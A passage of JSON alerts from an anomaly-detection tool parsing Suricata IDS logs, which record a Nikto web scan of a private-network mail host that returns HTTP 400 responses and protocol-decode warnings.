"/parser/model/time": 1583349514.375561, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1672202550949310,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46964,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.dbc\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.dbc\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46964,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.dbc\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.dbc\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.dbc\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": 
"CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.dbc\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.dbc", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.dbc", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": 
",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46964,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46964, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1672202550949310,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", 
"/parser/model/flow_id/flow_id/flow_id": 1672202550949310, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.375561+0000\",\"flow_id\":1672202550949310,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46964,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.dbc\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.dbc\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.38 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.377295 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46966 -> 192.168.10.154:80", "/parser/model/time": 1583349514.377295, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", 
"/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46966, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.377295 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46966 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.38 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.map", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.377734+0000\",\"flow_id\":2176156833595140,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46966,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.map\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.map\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", 
"/parser/model/time": 1583349514.377734, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":2176156833595140,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46966,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.map\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.map\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46966,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.map\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.map\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.map\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": 
"CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.map\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.map", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.map", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": 
",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46966,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46966, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":2176156833595140,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", 
"/parser/model/flow_id/flow_id/flow_id": 2176156833595140, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.377734+0000\",\"flow_id\":2176156833595140,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46966,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.map\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.map\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.38 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.379849 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46968 -> 192.168.10.154:80", "/parser/model/time": 1583349514.379849, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", 
"/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46968, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.379849 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46968 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.38 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.Big5", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.380109+0000\",\"flow_id\":1414354189338696,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46968,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.Big5\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.Big5\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", 
"/parser/model/time": 1583349514.380109, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1414354189338696,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46968,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.Big5\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.Big5\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46968,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.Big5\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.Big5\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.Big5\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", 
"/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.Big5\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.Big5", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.Big5", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": 
null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46968,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46968, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1414354189338696,", 
"/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1414354189338696, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.380109+0000\",\"flow_id\":1414354189338696,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46968,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.Big5\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.Big5\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.38 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.382662 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46970 -> 192.168.10.154:80", "/parser/model/time": 1583349514.382662, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", 
